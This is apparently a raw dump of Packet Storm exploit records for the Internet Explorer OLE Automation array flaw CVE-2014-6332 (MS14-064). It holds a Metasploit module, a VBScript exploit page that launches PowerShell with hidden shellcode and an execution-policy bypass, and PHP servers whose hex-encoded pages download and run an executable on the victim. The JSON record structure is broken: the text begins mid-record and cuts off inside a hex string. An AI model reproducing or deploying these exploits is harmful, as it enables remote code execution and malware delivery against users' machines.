Packet Storm [129100](<https://packetstormsecurity.com/files/129100/Windows-OLE-Automation-Array-Remote-Code-Execution.html>), published 2014-11-13. This is the earlier forsec.nl version of the same Metasploit module; the copy on this page breaks off inside `on_request_uri`.

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Powershell

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Windows OLE Automation Array Remote Code Execution",
      'Description'    => %q{
        This module exploits the Windows OLE Automation Array Remote Code Execution Vulnerability
        (MS14-064, CVE-2014-6332). The vulnerability exists in Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'IBM', # Discovery
          'yuange <twitter.com/yuange75>', # PoC
          'Rik van Duijn <twitter.com/rikvduijn>', #Metasploit
          'Wesley Neelen <security[at]forsec.nl>' #Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2014-6332' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => "none"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "November 12 2014",
      'DefaultTarget'  => 0))
  end

  def on_request_uri(cli, request)
    payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
    payl.slice!
```
\"powershell.exe \" \n \nhtml = <<-EOS \n<!doctype html> \n \n<html> \n \n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=EmulateIE8\" > \n \n<head> \n \n</head> \n \n<body> \n \n \n<SCRIPT LANGUAGE=\"VBScript\"> \n \n \nfunction trigger() \n \nOn Error Resume Next \n \nset shell=createobject(\"Shell.Application\") \n \nshell.ShellExecute \"powershell.exe\", \"#{payl}\", \"\", \"open\", 1 \n \nend function \n \n \n</script> \n \n \n<SCRIPT LANGUAGE=\"VBScript\"> \n \n \n \ndim aa() \n \ndim ab() \n \ndim a0 \n \ndim a1 \n \ndim a2 \n \ndim a3 \n \ndim win9x \n \ndim intVersion \n \ndim rnda \n \ndim funclass \n \ndim myarray \n \n \nBegin() \n \n \nfunction Begin() \n \nOn Error Resume Next \n \ninfo=Navigator.UserAgent \n \n \nif(instr(info,\"Win64\")>0) then \n \nexit function \n \nend if \n \n \nif (instr(info,\"MSIE\")>0) then \n \nintVersion = CInt(Mid(info, InStr(info, \"MSIE\") + 5, 2)) \n \nelse \n \nexit function \n \n \n \nend if \n \n \nwin9x=0 \n \n \nBeginInit() \n \nIf Create()=True Then \n \nmyarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) \n \nmyarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) \n \n \nif(intVersion<4) then \n \ndocument.write(\"<br> IE\") \n \ndocument.write(intVersion) \n \nrunshellcode() \n \nelse \n \nsetnotsafemode() \n \nend if \n \nend if \n \nend function \n \n \nfunction BeginInit() \n \nRandomize() \n \nredim aa(5) \n \nredim ab(5) \n \na0=13+17*rnd(6) \n \na3=7+3*rnd(5) \n \nend function \n \n \nfunction Create() \n \nOn Error Resume Next \n \ndim i \n \nCreate=False \n \nFor i = 0 To 400 \n \nIf Over()=True Then \n \n' document.write(i) \n \nCreate=True \n \nExit For \n \nEnd If \n \nNext \n \nend function \n \n \nsub testaa() \n \nend sub \n \n \nfunction mydata() \n \nOn Error Resume Next \n \ni=testaa \n \ni=null \n \nredim Preserve aa(a2) \n \n \n \nab(0)=0 \n \naa(a1)=i \n \nab(0)=6.36598737437801E-314 \n \n \naa(a1+2)=myarray \n \nab(2)=1.74088534731324E-310 \n \nmydata=aa(a1) 
\n \nredim Preserve aa(a0) \n \nend function \n \n \n \nfunction setnotsafemode() \n \nOn Error Resume Next \n \ni=mydata() \n \ni=readmemo(i+8) \n \ni=readmemo(i+16) \n \nj=readmemo(i+&h134) \n \nfor k=0 to &h60 step 4 \n \nj=readmemo(i+&h120+k) \n \nif(j=14) then \n \nj=0 \n \nredim Preserve aa(a2) \n \naa(a1+2)(i+&h11c+k)=ab(4) \n \nredim Preserve aa(a0) \n \n \nj=0 \n \nj=readmemo(i+&h120+k) \n \n \n \nExit for \n \nend if \n \n \nnext \n \nab(2)=1.69759663316747E-313 \n \ntrigger() \n \nend function \n \n \nfunction Over() \n \nOn Error Resume Next \n \ndim type1,type2,type3 \n \nOver=False \n \na0=a0+a3 \n \na1=a0+2 \n \na2=a0+&h8000000 \n \n \n \nredim Preserve aa(a0) \n \nredim ab(a0) \n \n \n \nredim Preserve aa(a2) \n \n \n \ntype1=1 \n \nab(0)=1.123456789012345678901234567890 \n \naa(a0)=10 \n \n \n \nIf(IsObject(aa(a1-1)) = False) Then \n \nif(intVersion<4) then \n \nmem=cint(a0+1)*16 \n \nj=vartype(aa(a1-1)) \n \nif((j=mem+4) or (j*8=mem+8)) then \n \nif(vartype(aa(a1-1))<>0) Then \n \nIf(IsObject(aa(a1)) = False ) Then \n \ntype1=VarType(aa(a1)) \n \nend if \n \nend if \n \nelse \n \nredim Preserve aa(a0) \n \nexit function \n \n \nend if \n \nelse \n \nif(vartype(aa(a1-1))<>0) Then \n \nIf(IsObject(aa(a1)) = False ) Then \n \ntype1=VarType(aa(a1)) \n \nend if \n \nend if \n \nend if \n \nend if \n \n \n \n \n \nIf(type1=&h2f66) Then \n \nOver=True \n \nEnd If \n \nIf(type1=&hB9AD) Then \n \nOver=True \n \nwin9x=1 \n \nEnd If \n \n \nredim Preserve aa(a0) \n \n \n \nend function \n \n \nfunction ReadMemo(add) \n \nOn Error Resume Next \n \nredim Preserve aa(a2) \n \n \n \nab(0)=0 \n \naa(a1)=add+4 \n \nab(0)=1.69759663316747E-313 \n \nReadMemo=lenb(aa(a1)) \n \n \n \nab(0)=0 \n \n \n \nredim Preserve aa(a0) \n \nend function \n \n \n</script> \n \n \n</body> \n \n</html> \nEOS \n \nprint_status(\"Sending html\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \n \nend \n \nend \n \n`\n", "sourceHref": 
"https://packetstormsecurity.com/files/download/129100/ms14_064_ie_olerce.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:12:13", "description": "", "cvss3": {}, "published": "2014-11-21T00:00:00", "type": "packetstorm", "title": "Microsoft Internet Explorer OLE Pre-IE11 Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2014-11-21T00:00:00", "id": "PACKETSTORM:129210", "href": "https://packetstormsecurity.com/files/129210/Microsoft-Internet-Explorer-OLE-Pre-IE11-Code-Execution.html", "sourceData": "`<!doctype html> \n<html> \n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=EmulateIE8\" > \n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" /> \n<body> \n \n<pre> \n|--------------------------------------------------------------------------| \n| Title: OLE Automation Array Remote Code Execution => Pre IE11 | \n| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ | \n| Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec) | \n| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual | \n| Usage: http://www.fuzzysecurity.com/exploits/21.html | \n|--------------------------------------------------------------------------| \nVery nice black-magic yuange, don't think it went unnoticed that you \nhave been popping shells since 2009 :D \u4eba\u65e0\u5343\u65e5\u597d\uff0c\u82b1\u65e0\u767e\u65e5\u7ea2 \n|--------------------------------------------------------------------------| \n</pre> \n \n<SCRIPT LANGUAGE=\"VBScript\"> \nfunction runmumaa() \nOn Error Resume Next \nset shell=createobject(\"Shell.Application\") \n \n'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!' 
\npayload=\"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\" \n \ncommand=\"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"\"\"\"\" & chr(34) & payload & chr(34) & \"\"\"\"\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\" \n \nparams=\"-NoP -NonI -Exec Bypass -Command \" & command \n \n'Original POC yuange \n'set shell=createobject(\"Shell.Application\") \n'shell.ShellExecute \"notepad.exe\" \n \n'With UAC \n'shell.ShellExecute \"powershell\", params, \"\", \"runas\", 0 \n \n'Without UAC \nshell.ShellExecute \"powershell\", params, \"\", \"\", 0 \n \nend function \n</script> \n \n<SCRIPT LANGUAGE=\"VBScript\"> \n \ndim aa() \ndim ab() \ndim a0 \ndim a1 \ndim a2 \ndim a3 \ndim win9x \ndim intVersion \ndim rnda \ndim funclass \ndim myarray \n \nBegin() \n \nfunction Begin() \nOn Error Resume Next \ninfo=Navigator.UserAgent \n \nif(instr(info,\"Win64\")>0) then \nexit function \nend if \n \nif (instr(info,\"MSIE\")>0) then \nintVersion = CInt(Mid(info, InStr(info, \"MSIE\") + 5, 2)) \nelse \nexit function \n \nend if \n \nwin9x=0 \n \nBeginInit() \nIf Create()=True Then \nmyarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) \nmyarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) \n \nif(intVersion<4) then \ndocument.write(\"<br> IE\") \ndocument.write(intVersion) \nrunshellcode() \nelse \nsetnotsafemode() \nend if \nend if \nend function \n \nfunction BeginInit() \nRandomize() \nredim aa(5) \nredim ab(5) \na0=13+17*rnd(6) \na3=7+3*rnd(5) \nend function \n \nfunction Create() \nOn Error Resume Next \ndim i \nCreate=False \nFor i = 0 To 400 \nIf Over()=True Then \n' document.write(i) \nCreate=True \nExit For \nEnd If \nNext \nend function \n \nsub testaa() \nend sub \n \nfunction mydata() \nOn Error Resume Next \ni=testaa \ni=null \nredim Preserve aa(a2) \n \nab(0)=0 \naa(a1)=i 
\nab(0)=6.36598737437801E-314 \n \naa(a1+2)=myarray \nab(2)=1.74088534731324E-310 \nmydata=aa(a1) \nredim Preserve aa(a0) \nend function \n \n \nfunction setnotsafemode() \nOn Error Resume Next \ni=mydata() \ni=readmemo(i+8) \ni=readmemo(i+16) \nj=readmemo(i+&h134) \nfor k=0 to &h60 step 4 \nj=readmemo(i+&h120+k) \nif(j=14) then \nj=0 \nredim Preserve aa(a2) \naa(a1+2)(i+&h11c+k)=ab(4) \nredim Preserve aa(a0) \n \nj=0 \nj=readmemo(i+&h120+k) \n \nExit for \nend if \n \nnext \nab(2)=1.69759663316747E-313 \nrunmumaa() \nend function \n \nfunction Over() \nOn Error Resume Next \ndim type1,type2,type3 \nOver=False \na0=a0+a3 \na1=a0+2 \na2=a0+&h8000000 \n \nredim Preserve aa(a0) \nredim ab(a0) \n \nredim Preserve aa(a2) \n \ntype1=1 \nab(0)=1.123456789012345678901234567890 \naa(a0)=10 \n \nIf(IsObject(aa(a1-1)) = False) Then \nif(intVersion<4) then \nmem=cint(a0+1)*16 \nj=vartype(aa(a1-1)) \nif((j=mem+4) or (j*8=mem+8)) then \nif(vartype(aa(a1-1))<>0) Then \nIf(IsObject(aa(a1)) = False ) Then \ntype1=VarType(aa(a1)) \nend if \nend if \nelse \nredim Preserve aa(a0) \nexit function \n \nend if \nelse \nif(vartype(aa(a1-1))<>0) Then \nIf(IsObject(aa(a1)) = False ) Then \ntype1=VarType(aa(a1)) \nend if \nend if \nend if \nend if \n \n \nIf(type1=&h2f66) Then \nOver=True \nEnd If \nIf(type1=&hB9AD) Then \nOver=True \nwin9x=1 \nEnd If \n \nredim Preserve aa(a0) \n \nend function \n \nfunction ReadMemo(add) \nOn Error Resume Next \nredim Preserve aa(a2) \n \nab(0)=0 \naa(a1)=add+4 \nab(0)=1.69759663316747E-313 \nReadMemo=lenb(aa(a1)) \n \nab(0)=0 \n \nredim Preserve aa(a0) \nend function \n \n</script> \n \n</body> \n</html> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/129210/ieolepreie11-exec.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:20:27", "description": "", "cvss3": {}, "published": "2015-08-17T00:00:00", "type": "packetstorm", "title": "Microsoft 
Windows HTA Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-08-17T00:00:00", "id": "PACKETSTORM:133107", "href": "https://packetstormsecurity.com/files/133107/Microsoft-Windows-HTA-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/php \n<?php \n# Title : Microsoft Windows HTA (HTML Application) - Remote Code Execution \n# Tested on Windows 7 / Server 2008 \n# \n# \n# Author : Mohammad Reza Espargham \n# Linkedin : https://ir.linkedin.com/in/rezasp \n# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com \n# Website : www.reza.es \n# Twitter : https://twitter.com/rezesp \n# FaceBook : https://www.facebook.com/mohammadreza.espargham \n# \n# \n# MS14-064 \n# \n# \n# 1 . run php code : php hta.php \n# 2 . copy this php output (HTML) and Paste as poc.hta (Replace ip) \n# 3 . open poc.hta \n# 4 . Your Link Download/Execute on your target \n# 5 . Finished ;) \n# \n# Demo : http://youtu.be/Vkswz7vt23M \n# \n \n \n \n \n$port=80; # Port Address \n$link=\"http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\"; # Your exe link \n \n \n \nprint \" Mohammad Reza Espargham\\n\\n\\n\"; \n \n$host= gethostname(); #g3th0stn4m3 \n$ip = gethostbyname($host); #g3th0stbyn4m3 \n \nprint \"Winrar HTML Code\\n\".'<html><head><title>poc</title><META http-equiv=\"refresh\" content=\"0;URL=http://' . $ip . '\"></head></html>'.\"\\n\\n\"; \n \n$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); \nsocket_bind($reza, 0,$port); \nsocket_listen($reza); \n \n$msgd = \n\"\\x3c\\x68\\x74\\x6d\\x6c\\x3e\\x0d\\x0a\\x3c\\x6d\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2d\\x65\\x71\\x75\\x69\\x76\". \n\"\\x3d\\x22\\x58\\x2d\\x55\\x41\\x2d\\x43\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x22\\x20\\x63\\x6f\\x6e\\x74\\x65\". \n\"\\x6e\\x74\\x3d\\x22\\x49\\x45\\x3d\\x45\\x6d\\x75\\x6c\\x61\\x74\\x65\\x49\\x45\\x38\\x22\\x20\\x3e\\x0d\\x0a\\x3c\\x68\". 
\n\"\\x3d\\x30\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3d\\x61\\x64\\x64\\x2b\\x34\\x20\". \n\"\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3d\\x31\\x2e\\x36\\x39\\x37\\x35\\x39\\x36\". \n\"\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2d\\x33\\x31\\x33\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\". \n\"\\x20\\x20\\x72\\x75\\x6d\\x3d\\x6c\\x65\\x6e\\x62\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x20\\x0d\\x0a\\x20\\x20\". \n\"\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3d\\x30\\x0d\\x0a\\x20\\x20\\x20\\x20\\x72\\x65\\x64\". \n\"\\x69\\x6d\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0d\\x0a\\x65\\x6e\\x64\". \n\"\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\\x0a\\x20\\x0d\\x0a\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e\\x0d\". \n\"\\x0a\\x20\\x0d\\x0a\\x3c\\x2f\\x62\\x6f\\x64\\x79\\x3e\\x0d\\x0a\\x3c\\x2f\\x68\\x74\\x6d\\x6c\\x3e\"; \n$msgd=str_replace(\"FILE_DOWNLOAD\",$link,$msgd); \n \nfor (;;) { \nif ($client = @socket_accept($reza)) { \nsocket_write($client, \"HTTP/1.1 200 OK\\r\\n\" . \n\"Content-length: \" . strlen($msgd) . \"\\r\\n\" . \n\"Content-Type: text/html; charset=UTF-8\\r\\n\\r\\n\" . 
\n$msgd); \nprint \"\\n Target Checked Your Link \\n\"; \n} \nelse usleep(100000); \n} \n \n \n?> \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/133107/mswinhta-exec.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:20:29", "description": "", "cvss3": {}, "published": "2015-10-21T00:00:00", "type": "packetstorm", "title": "Avant Browser Lite / Ultimate Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-10-21T00:00:00", "id": "PACKETSTORM:134053", "href": "https://packetstormsecurity.com/files/134053/Avant-Browser-Lite-Ultimate-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/php \n<?php \n########################################################## \n# Author : Ehsan Noreddini \n# E-Mail : me@ehsann.info \n# Social : @prot3ct0r \n# Title : Avant Browser Remote Code Execution \n# Avant Browser is an ultra-fast web browser. Its user-friendly interface brings a new level of clarity and efficiency to your browsing experience, and frequent upgrades have steadily improved its reliability. \n# Version : Lite and Ultimate \n# Release : Stable \n# Build : build 28, 9.30.2015 \n# CVE : CVE2014-6332 \n# Tested on : Windows7 \n# Download : http://www.avantbrowser.com/download.aspx?uil=en-US \n# Website : http://www.avantbrowser.com/ \n########################################################## \n# 1. run php code : php exploit.php \n# 2. get the output address and open it in browser ! 
\n########################################################## \n# Shot : http://ehsann.info/proof/Avant_Browser_Remote_Code_Execution.png \n# Video : https://www.youtube.com/watch?v=a4TjAOCy-qs \n# Original Code : http://ehsann.info/exploit/3.txt \n########################################################## \n \nprint \"Avant Browser Remote Code Execution Exploit \\r\\n\"; \n$port=80; # Port Address \n$link=\"http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\"; # Your malicious file \n$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); \nsocket_bind($socket, 0,$port); \nsocket_listen($socket); \n# MS14-064 \n$msgd = \"\\x3C\\x68\\x74\\x6D\\x6C\\x3E\\x0D\\x0A\\x3C\\x6D\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2D\\x65\\x71\\x75\\x69\\x76\\x3D\\x22\\x58\\x2D\\x55\\x41\\x2D\\x43\\x6F\\x6D\\x70\\x61\\x74\\x69\\x62\\x6C\\x65\\x22\\x20\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x3D\\x22\\x49\\x45\\x3D\\x45\\x6D\\x75\\x6C\\x61\\x74\\x65\\x49\\x45\\x38\\x22\\x20\\x3E\\x0D\\x0A\\x3C\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x2F\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x62\\x6F\\x64\\x79\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x72\\x75\\x6E\\x6D\\x75\\x6D\\x61\\x61\\x28\\x29\\x20\\x0D\\x0A\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x73\\x65\\x74\\x20\\x73\\x68\\x65\\x6C\\x6C\\x3D\\x63\\x72\\x65\\x61\\x74\\x65\\x6F\\x62\\x6A\\x65\\x63\\x74\\x28\\x22\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x22\\x29\\x0D\\x0A\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x3D\\x22\\x49\\x6E\\x76\\x6F\\x6B\\x65\\x2D\\x45\\x78\\x70\\x72\\x65\\x73\\x73\\x69\\x6F\\x6E\\x20\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x53\\x79\\x73\\x74\\x65\\x6D\\x2E\\x4E\\x65\\x74\
\x2E\\x57\\x65\\x62\\x43\\x6C\\x69\\x65\\x6E\\x74\\x29\\x2E\\x44\\x6F\\x77\\x6E\\x6C\\x6F\\x61\\x64\\x46\\x69\\x6C\\x65\\x28\\x27\\x44\\x4F\\x57\\x4E\\x4C\\x4F\\x41\\x44\\x27\\x2C\\x27\\x6C\\x6F\\x61\\x64\\x2E\\x65\\x78\\x65\\x27\\x29\\x3B\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x2D\\x63\\x6F\\x6D\\x20\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x29\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x28\\x27\\x6C\\x6F\\x61\\x64\\x2E\\x65\\x78\\x65\\x27\\x29\\x3B\\x22\\x0D\\x0A\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x20\\x22\\x70\\x6F\\x77\\x65\\x72\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x65\\x78\\x65\\x22\\x2C\\x20\\x22\\x2D\\x43\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x20\\x22\\x20\\x26\\x20\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x2C\\x20\\x22\\x22\\x2C\\x20\\x22\\x72\\x75\\x6E\\x61\\x73\\x22\\x2C\\x20\\x30\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x61\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x62\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x30\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x31\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x32\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x33\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x72\\x6E\\x64\\x61\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x6C\\x61\\x73\\x73\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x0D\\x0A\\x20\\x0D\\x0A\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\
\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x69\\x6E\\x66\\x6F\\x3D\\x4E\\x61\\x76\\x69\\x67\\x61\\x74\\x6F\\x72\\x2E\\x55\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x57\\x69\\x6E\\x36\\x34\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x20\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x20\\x3D\\x20\\x43\\x49\\x6E\\x74\\x28\\x4D\\x69\\x64\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x49\\x6E\\x53\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x20\\x2B\\x20\\x35\\x2C\\x20\\x32\\x29\\x29\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x3D\\x30\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x42\\x65\\x67\\x69\\x6E\\x49\\x6E\\x69\\x74\\x28\\x29\\x0D\\x0A\\x20\\x20\\x49\\x66\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x28\\x29\\x3D\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x3D\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x63\\x68\\x72\\x77\\x28\
\x30\\x31\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x32\\x31\\x37\\x36\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x3D\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x33\\x32\\x37\\x36\\x37\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x29\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x3C\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x77\\x72\\x69\\x74\\x65\\x28\\x22\\x3C\\x62\\x72\\x3E\\x20\\x49\\